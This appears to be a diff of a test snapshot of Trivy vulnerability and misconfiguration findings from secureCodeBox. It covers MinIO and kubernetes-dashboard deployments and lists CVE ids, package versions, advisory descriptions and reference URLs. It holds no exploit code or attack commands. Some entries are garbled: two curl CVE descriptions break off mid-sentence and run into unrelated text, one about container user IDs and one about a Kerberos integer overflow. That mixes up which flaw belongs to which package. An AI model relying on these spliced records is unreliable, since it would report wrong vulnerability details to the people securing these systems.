Type: 'gobinary'", + "id": "CVE-2023-2253", + "installedVersion": "v2.8.1+incompatible", + "packageName": "github.com/docker/distribution", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/security/cve/CVE-2023-2253", + "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", + "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", + "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", + "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", + "https://www.cve.org/CVERecord?id=CVE-2023-2253", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "A flaw was found in the \`/v2/_catalog\` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: \`n\`). This vulnerability allows a malicious user to submit an unreasonably large value for \`n,\` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "DoS from malicious API request", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2023-2253", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/security/cve/CVE-2023-2253", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2189886", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://github.com/advisories/GHSA-hqxw-f8mx-cpmw", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://github.com/distribution/distribution/commit/f55a6552b006a381d9167e328808565dd2bf77dc", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://github.com/distribution/distribution/security/advisories/GHSA-hqxw-f8mx-cpmw", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2253", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2253", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'dashboard' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220722155237-a158d28d115b", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2107383", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "7.74.0-1.3+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-32221", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", - "references": [ - "http://seclists.org/fulldisclosure/2023/Jan/19", - "http://seclists.org/fulldisclosure/2023/Jan/20", - "http://www.openwall.com/lists/oss-security/2023/05/17/4", - "https://access.redhat.com/errata/RHSA-2023:0333", - "https://access.redhat.com/security/cve/CVE-2022-32221", - "https://bugzilla.redhat.com/2135411", - "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", - "https://curl.se/docs/CVE-2022-32221.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", - "https://errata.almalinux.org/9/ALSA-2023-0333.html", - "https://errata.rockylinux.org/RLSA-2023:0333", - "https://hackerone.com/reports/1704017", - "https://linux.oracle.com/cve/CVE-2022-32221.html", - "https://linux.oracle.com/errata/ELSA-2023-0333.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", - "https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", - ], - }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", - ], - }, - "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-43552", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230214-0002/", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kubernetes-dashboard' of Deployment 'kubernetes-dashboard' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://support.apple.com/kb/HT213670", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5788-1", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/kubernetes-dashboard' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=kubernetes-dashboard", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5894-1", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-43552", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23915", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "apt", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23915", - "https://curl.se/docs/CVE-2023-23915.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23915", - "https://hackerone.com/reports/1826048", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23915", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23915", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + }, + { + "type": "URL", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libblkid1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, - { - "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": 